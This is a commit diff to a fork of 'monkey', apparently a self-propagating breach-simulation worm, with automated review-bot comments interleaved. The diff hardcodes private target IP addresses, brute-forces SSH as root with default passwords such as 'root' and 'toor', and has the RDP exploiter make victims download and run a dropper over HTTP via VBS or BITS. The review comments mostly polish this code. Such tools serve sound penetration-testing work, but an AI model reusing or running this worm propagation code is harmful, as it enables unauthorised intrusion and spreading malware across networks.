forked from p34709852/monkey
minor bug fix
parent
410891518f
commit
73f9821ee4
|
@ -96,6 +96,8 @@ class Configuration(object):
|
|||
### monkey config
|
||||
###########################
|
||||
|
||||
alive = True
|
||||
|
||||
singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
|
||||
|
||||
# how long to wait between scan iterations
|
||||
|
@ -127,11 +129,11 @@ class Configuration(object):
|
|||
|
||||
#range_class = RelativeRange
|
||||
range_size = 8
|
||||
range_class = ClassCRange
|
||||
range_fixed = ("10.0.0.1")
|
||||
range_class = FixedRange
|
||||
range_fixed = ("10.0.0.9", "10.0.0.13", "192.168.1.100", "192.168.1.87")
|
||||
|
||||
# TCP Scanner
|
||||
tcp_target_ports = [22, 445, 135]
|
||||
tcp_target_ports = [22, 445, 135, 3389]
|
||||
tcp_scan_timeout = 1000 # 1000 Milliseconds
|
||||
tcp_scan_interval = 200
|
||||
tcp_scan_get_banner = True
|
||||
|
@ -157,6 +159,7 @@ class Configuration(object):
|
|||
ssh_user = "root"
|
||||
ssh_passwords = ["root", "toor", "1234", "12345678"]
|
||||
|
||||
alive = True
|
||||
#rdp exploiter
|
||||
rdp_use_vbs_download = True
|
||||
|
||||
WormConfiguration = Configuration()
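Review bot: The committed defaults in the second hunk now appear to fix the scan scope in code: `range_class = FixedRange` together with four literal addresses in `range_fixed`, so any run with the unmodified configuration touches those hosts wherever it is deployed. Keep environment-specific scope out of the shipped defaults, for example `range_fixed = ()  # set per deployment from the approved scope`, and have the scanner refuse to start when it is empty. Separately, `alive = True` is printed in both the first and the third hunk; if both are on the new side, the attribute is assigned twice in `Configuration` and one assignment should be dropped. The class body extends beyond these hunks, and which lines are old or new is inferred from the hunk header counts.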
|
|
@ -11,7 +11,7 @@ from rdpy.core.error import RDPSecurityNegoFail
|
|||
from logging import getLogger
|
||||
from exploit import HostExploiter
|
||||
from exploit.tools import HTTPTools
|
||||
from model import RDP_CMDLINE_HTTP_BITS
|
||||
from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
|
||||
from model.host import VictimHost
|
||||
from network.tools import check_port_tcp
|
||||
from exploit.tools import get_target_monkey
|
||||
|
@ -243,7 +243,10 @@ class RdpExploiter(HostExploiter):
|
|||
# create server for http download.
|
||||
http_path, http_thread = HTTPTools.create_transfer(host, src_path)
|
||||
|
||||
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(src_path), 'http_path' : http_path}
|
||||
if self._config.rdp_use_vbs_download:
|
||||
command = RDP_CMDLINE_HTTP_VBS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
|
||||
else:
|
||||
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
|
||||
|
||||
passwords = list(self._config.psexec_passwords[:])
|
||||
known_password = host.get_credentials(self._config.psexec_user)
|
||||
|
@ -289,9 +292,6 @@ class RdpExploiter(HostExploiter):
|
|||
LOG.debug("Exploiter RdpGrinder failed, rdp failed.")
|
||||
return False
|
||||
elif http_thread.downloads == 0:
|
||||
LOG.info("Trying rdp logging into victim %r with user"
|
||||
" %s and password '%s'", host,
|
||||
self._config.psexec_user, password)
|
||||
LOG.debug("Exploiter RdpGrinder failed, http download failed.")
|
||||
return False
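Review bot: The two branches added ahead of `passwords = list(...)` differ only in the template constant, yet each repeats the whole `%` mapping, so the two copies can drift apart. Select the template first and format once: `template = RDP_CMDLINE_HTTP_VBS if self._config.rdp_use_vbs_download else RDP_CMDLINE_HTTP_BITS`, then a single `command = template % {...}`. The change of `monkey_name` from `os.path.basename(src_path)` to `os.path.basename(self._config.dropper_target_path)` alters behaviour that the commit title does not mention and deserves a one-line comment giving the reason. The method starts and ends outside these hunks.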
|
||||
|
||||
|
|
|
@ -3,6 +3,7 @@ from logging import getLogger
|
|||
from model.host import VictimHost
|
||||
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
|
||||
from exploit import HostExploiter
|
||||
from network.tools import check_port_tcp
|
||||
from exploit.tools import SmbTools, get_target_monkey
|
||||
from network import SMBFinger
|
||||
|
||||
|
@ -49,7 +50,7 @@ class SmbExploiter(HostExploiter):
|
|||
is_nb_open,_ = check_port_tcp(host.ip_addr, 139)
|
||||
if is_nb_open:
|
||||
host.os['type'] = 'windows'
|
||||
return super(HostExploiter, self).is_os_supported(host)
|
||||
return host.os.get('type') in self._target_os_type
|
||||
return False
|
||||
|
||||
def exploit_host(self, host, src_path=None):
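Review bot: `is_os_supported` now appears to answer with its own membership test, `host.os.get('type') in self._target_os_type`, instead of delegating, which duplicates whatever the base class checks and will miss later changes made there. The earlier `super(HostExploiter, self)` call started the lookup after `HostExploiter` and so skipped its implementation, if it defines one; naming the subclass keeps the delegation: `return super(SmbExploiter, self).is_os_supported(host)`. Which of the two `return` lines is the new side is inferred from the hunk header counts, and the method starts outside the hunk.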
|
||||
|
|
|
@ -5,10 +5,12 @@ import logging
|
|||
from exploit import HostExploiter
|
||||
from model import MONKEY_ARG
|
||||
from exploit.tools import get_target_monkey
|
||||
from network.tools import check_port_tcp
|
||||
|
||||
__author__ = 'hoffer'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
SSH_PORT = 22
|
||||
|
||||
class SSHExploiter(HostExploiter):
|
||||
_target_os_type = ['linux', None]
|
||||
|
@ -20,6 +22,16 @@ class SSHExploiter(HostExploiter):
|
|||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
||||
|
||||
port = SSH_PORT
|
||||
for servkey,servdata in host.services.items():
|
||||
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
|
||||
port = int(servkey.replace('tcp-',''))
|
||||
|
||||
is_open,_ = check_port_tcp(host.ip_addr, port)
|
||||
if not is_open:
|
||||
LOG.info("SSH port is closed on %r, skipping", host)
|
||||
return False
|
||||
|
||||
passwords = list(self._config.ssh_passwords[:])
|
||||
known_password = host.get_credentials(self._config.ssh_user)
|
||||
if known_password is not None:
|
||||
|
@ -32,7 +44,8 @@ class SSHExploiter(HostExploiter):
|
|||
try:
|
||||
ssh.connect(host.ip_addr,
|
||||
username=self._config.ssh_user,
|
||||
password=password)
|
||||
password=password,
|
||||
port=port)
|
||||
|
||||
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
|
||||
host, self._config.ssh_user, password)
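Review bot: The `LOG.debug("Successfully logged in ...")` call directly after the updated `ssh.connect(...)` writes the working password into the log in clear text, so every log file and log collector downstream ends up holding a valid credential for the tested host. Log the host and user only, e.g. `LOG.debug("Successfully logged in %r using SSH (user %s)", host, self._config.ssh_user)`, and record the credential only where access to it is controlled. In the added port lookup, `int(servkey.replace('tcp-',''))` raises `ValueError` on a service key whose suffix is not numeric; a comment stating the expected key format (`tcp-<port>`) would make that assumption explicit. The method starts and ends outside these hunks.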
|
||||
|
|
|
@ -15,6 +15,7 @@ from model.host import VictimHost
|
|||
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
|
||||
from exploit import HostExploiter
|
||||
from exploit.tools import SmbTools, get_target_monkey
|
||||
from network.tools import check_port_tcp
|
||||
|
||||
try:
|
||||
from impacket import smb
|
||||
|
|
|
@ -5,6 +5,7 @@ import logging
|
|||
from network import HostScanner
|
||||
from config import WormConfiguration
|
||||
from info import local_ips
|
||||
from network.range import *
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
|
@ -26,6 +27,10 @@ class NetworkScanner(object):
|
|||
|
||||
LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses)
|
||||
|
||||
# for fixed range, only scan once.
|
||||
if WormConfiguration.range_class is FixedRange:
|
||||
self._ranges = [WormConfiguration.range_class('0.0.0.0')]
|
||||
else:
|
||||
self._ranges = [WormConfiguration.range_class(ip_address)
|
||||
for ip_address in self._ip_addresses]
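Review bot: `FixedRange` seems to reach this module only through the added `from network.range import *`, so the identity test `WormConfiguration.range_class is FixedRange` depends on a wildcard import that also pulls every other public name of `network.range` into the namespace. Import the name explicitly, `from network.range import FixedRange`, so the dependency is visible and cannot be shadowed silently. The literal `'0.0.0.0'` passed to `range_class` looks like a placeholder that `FixedRange` ignores; if that is the case, a comment such as `# base address is unused by FixedRange; targets come from range_fixed` would say so. The enclosing method starts outside the hunk.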
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@ from model.host import VictimHost
|
|||
SSH_PORT = 22
|
||||
SSH_SERVICE = 'tcp-22'
|
||||
SSH_REGEX = 'SSH-\d\.\d-OpenSSH'
|
||||
TIMEOUT = 30
|
||||
TIMEOUT = 10
|
||||
BANNER_READ = 1024
|
||||
LINUX_DIST_SSH = ['ubuntu', 'debian']
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
import socket
|
||||
import select
|
||||
|
||||
DEFAULT_TIMEOUT = 30
|
||||
DEFAULT_TIMEOUT = 10
|
||||
BANNER_READ = 1024
|
||||
|
||||
def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
|
||||
|
|